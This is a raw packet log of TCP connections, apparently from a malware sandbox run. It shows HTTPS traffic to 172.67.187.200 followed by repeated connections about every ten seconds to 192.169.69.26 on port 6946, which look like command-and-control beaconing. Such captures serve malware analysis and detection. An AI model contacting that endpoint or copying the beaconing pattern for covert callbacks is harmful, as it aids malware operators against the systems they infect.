                                                                                          Dec 17, 2024 09:45:47.784817934 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.784884930 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.784893036 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.784966946 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.792678118 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.792694092 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.792853117 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.796768904 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.796777010 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.796854973 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.804815054 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.804826021 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.804910898 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.812655926 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.812808990 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.820771933 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.820945978 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.824783087 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.824899912 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.832717896 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.832856894 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.836754084 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.836841106 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.844727039 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.844858885 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.850742102 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.850923061 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.858748913 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.858870983 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.943054914 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.943145990 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.949870110 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.949933052 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.953129053 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.953191042 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.959216118 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.959319115 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.965264082 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.965369940 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.968285084 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.968358040 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.973958969 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.974047899 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.980520010 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.980612040 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.982491970 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.982563972 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.987896919 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.987971067 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.992914915 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.992981911 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:47.995620966 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:47.995676994 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.000855923 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.000943899 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.006084919 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.006145000 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.010220051 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.010282040 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.012803078 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.012862921 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.018106937 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.018177032 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.023353100 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.023413897 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.028579950 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.028650045 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.031347036 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.031423092 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.036569118 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.036649942 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.041948080 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.042025089 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.061288118 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.061372995 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.062592030 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.062644958 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.067852020 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.067922115 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.137690067 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.137705088 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.137747049 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.137824059 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.137846947 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.137881994 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.137916088 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.147510052 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.147623062 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.147635937 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.147691965 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.161176920 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.161196947 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.161314011 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.161336899 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.171096087 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.171116114 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.171196938 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.171214104 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.183531046 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.183546066 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.183660030 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.183684111 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.191277981 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.191296101 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.191370964 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.191387892 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.198601961 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.198616982 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.198689938 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.198704958 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.206012011 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.206036091 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.206346035 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.206357956 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.251286030 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.327003956 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.327035904 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.327174902 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.327195883 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.330159903 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.332845926 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.332863092 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.332962990 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.332973003 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.334136009 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.338992119 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.339008093 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.339140892 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.339152098 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.342246056 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.344316959 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.344338894 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.344381094 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.344388962 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.344429970 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.344429970 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.350713015 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.350729942 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.350789070 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.350800037 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.351339102 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.356332064 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.356348991 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.356434107 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.356445074 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.356659889 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.362312078 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.362330914 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.362375021 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.362382889 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.362416029 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.362525940 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.368460894 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.368478060 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.368544102 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.368555069 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.368660927 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.518507957 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.518543005 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.518985987 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.519006014 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.522214890 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.524614096 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.524692059 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.524755001 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.524764061 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.524861097 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.530801058 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.530843973 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.530932903 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.530944109 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.531021118 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.536138058 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.536154985 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.536379099 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.536386967 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.536521912 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.542251110 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.542265892 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.542823076 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.542830944 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.543966055 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.547960997 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.547977924 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.548028946 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.548038006 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.548084021 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.554042101 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.554056883 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.554157972 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.554169893 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.558594942 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.560210943 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.560230017 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.560636997 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.560645103 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.562019110 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.710633039 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.710669041 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.710732937 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.710750103 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.710787058 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.710787058 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.716835976 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.716873884 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.716959953 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.716959953 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.716972113 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.717039108 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.722850084 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.722875118 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.722946882 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.722961903 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.723004103 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.724536896 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.724652052 CET44349710172.67.187.200192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.724685907 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.724812984 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:48.725037098 CET49710443192.168.2.8172.67.187.200
                                                                                          Dec 17, 2024 09:45:49.173036098 CET497116946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:45:49.292763948 CET694649711192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:45:49.292855024 CET497116946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:45:49.298485041 CET497116946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:45:49.418294907 CET694649711192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:45:59.728034019 CET694649711192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:45:59.728111029 CET497116946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:45:59.728176117 CET497116946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:45:59.849127054 CET694649711192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:46:00.737004995 CET497126946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:00.856791973 CET694649712192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:46:00.856865883 CET497126946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:00.888525963 CET497126946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:01.008348942 CET694649712192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:46:11.315421104 CET694649712192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:46:11.315502882 CET497126946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:11.315603018 CET497126946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:11.435281038 CET694649712192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:46:12.330487967 CET497146946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:12.450550079 CET694649714192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:46:12.450639009 CET497146946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:12.454372883 CET497146946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:12.574292898 CET694649714192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:46:22.826148033 CET694649714192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:46:22.826217890 CET497146946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:22.826282024 CET497146946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:22.946170092 CET694649714192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:46:23.830491066 CET497156946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:23.950397015 CET694649715192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:46:23.954345942 CET497156946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:23.960299969 CET497156946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:24.080198050 CET694649715192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:46:34.275022030 CET694649715192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:46:34.275094032 CET497156946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:34.275192022 CET497156946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:34.394999027 CET694649715192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:46:35.283576965 CET497166946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:35.403470993 CET694649716192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:46:35.403723955 CET497166946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:35.422528028 CET497166946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:35.542402029 CET694649716192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:46:45.853030920 CET694649716192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:46:45.853118896 CET497166946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:45.853312969 CET497166946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:45.974328995 CET694649716192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:46:46.861999989 CET497176946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:46.981822014 CET694649717192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:46:46.981991053 CET497176946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:46.985604048 CET497176946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:47.105402946 CET694649717192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:46:57.358263016 CET694649717192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:46:57.358387947 CET497176946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:57.358438015 CET497176946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:57.478368998 CET694649717192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:46:58.712229013 CET497186946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:58.832087994 CET694649718192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:46:58.832182884 CET497186946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:58.835688114 CET497186946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:46:58.955430984 CET694649718192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:47:09.271541119 CET694649718192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:47:09.271645069 CET497186946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:09.271723032 CET497186946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:09.391558886 CET694649718192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:47:10.283497095 CET497196946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:10.404305935 CET694649719192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:47:10.404412031 CET497196946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:10.407979965 CET497196946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:10.529035091 CET694649719192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:47:21.244183064 CET694649719192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:47:21.244491100 CET694649719192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:47:21.244621992 CET497196946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:21.244679928 CET497196946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:21.364492893 CET694649719192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:47:22.252787113 CET497206946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:22.372726917 CET694649720192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:47:22.372966051 CET497206946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:22.376373053 CET497206946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:22.496308088 CET694649720192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:47:32.806849957 CET694649720192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:47:32.806974888 CET497206946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:32.808100939 CET497206946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:32.927769899 CET694649720192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:47:33.819590092 CET497216946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:33.939698935 CET694649721192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:47:33.940896034 CET497216946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:33.944334030 CET497216946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:34.069044113 CET694649721192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:47:44.433439970 CET694649721192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:47:44.433551073 CET497216946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:44.433634996 CET497216946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:44.554234028 CET694649721192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:47:45.439799070 CET497226946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:45.560420990 CET694649722192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:47:45.560652018 CET497226946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:45.563981056 CET497226946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:45.684217930 CET694649722192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:47:55.939788103 CET694649722192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:47:55.939913988 CET497226946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:55.940218925 CET497226946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:56.061136961 CET694649722192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:47:56.963629007 CET497236946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:57.083512068 CET694649723192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:47:57.083600044 CET497236946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:57.103465080 CET497236946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:47:57.223340988 CET694649723192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:48:07.482323885 CET694649723192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:48:07.482455015 CET497236946192.168.2.8192.169.69.26
